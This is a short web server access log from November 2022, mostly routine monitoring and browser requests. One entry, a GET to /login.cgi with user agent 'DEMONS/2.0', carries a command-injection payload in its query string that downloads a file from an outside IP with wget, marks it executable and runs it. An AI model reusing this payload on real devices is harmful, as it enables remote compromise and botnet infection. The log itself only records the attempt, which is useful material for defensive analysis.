64.62.197.192 - - [08/Nov/2022:08:43:28 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Edg/106.0.1370.34"
94.102.61.10 - - [08/Nov/2022:08:43:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
212.91.246.72 - - [08/Nov/2022:08:43:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.145 - - [08/Nov/2022:08:44:21 +0100] "\x16\x03\x01" 501 318 "-" "-"
94.102.61.10 - - [08/Nov/2022:08:44:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
212.91.246.72 - - [08/Nov/2022:08:44:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:45:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:46:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:47:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:48:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.89.181.147 - - [08/Nov/2022:08:49:05 +0100] "GET /login.cgi?cli=aa%20aa%27;rm -rf /tmp/ff;wget%20http://51.38.17.48/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 404 310 "-" "DEMONS/2.0"
212.91.246.72 - - [08/Nov/2022:08:49:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:50:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:51:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:52:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:53:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
96.20.46.24 - - [08/Nov/2022:08:53:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [08/Nov/2022:08:54:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [08/Nov/2022:08:55:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
